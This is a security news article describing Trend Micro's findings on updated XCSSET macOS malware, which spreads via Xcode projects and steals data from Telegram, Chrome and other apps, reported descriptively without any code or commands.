Malware known to target the macOS operating system has been updated again to add more functionality to its set of tools that allow it to amass and exfiltrate sensitive data stored in a variety of applications, including apps such as Google Chrome and Telegram, as part of other “refinements in its tactics.”
XCSSET was discovered in August 2020, when it was discovered targeting Mac developers using an unusual distribution medium that involved injecting malicious payload into Xcode IDE projects that is executed when creating project files in Xcode.
Earlier in April, XCSSET received an upgrade which allowed malware writers to target macOS 11 Big Sur as well as Macs running on the M1 chipset by bypassing new security policies instituted by Apple in the latest operating system.
“The malware downloads its own open tool from its C2 server which is pre-signed with an ad-hoc signature, whereas if it was on macOS versions 10.15 and lower it would still use the system’s built-in open command to run the applications, ”Trend Micro researchers previously noted.
According to a new article published Thursday by the cybersecurity company, it was discovered that XCSSET executes a malicious AppleScript file to compress the folder containing the Telegram data (“~ / Library / Group Containers / 6N38VWS5BX.ru.keepcoder.Telegram”) in a ZIP archive file, before uploading it to a remote server under their control, allowing the malicious actor to log in using the victim’s accounts.
With Google Chrome, the malware attempts to steal passwords stored in the web browser – which are in turn encrypted using a master password called a “secure storage key” – by tricking the user into grant root privileges through a fraudulent dialog, by abusing elevated permissions. to run an unauthorized shell command to retrieve the iCloud Keychain master key, after which the content is decrypted and transmitted to the server.
Besides Chrome and Telegram, XCSSET also has the ability to loot valuable information from a variety of apps like Evernote, Opera, Skype, WeChat and Apple’s own Contacts and Notes apps by recovering said data from their respective sandbox directories.
“The discovery of how it can steal information from various applications highlights the degree to which the malware aggressively attempts to steal various types of information from affected systems,” the researchers said.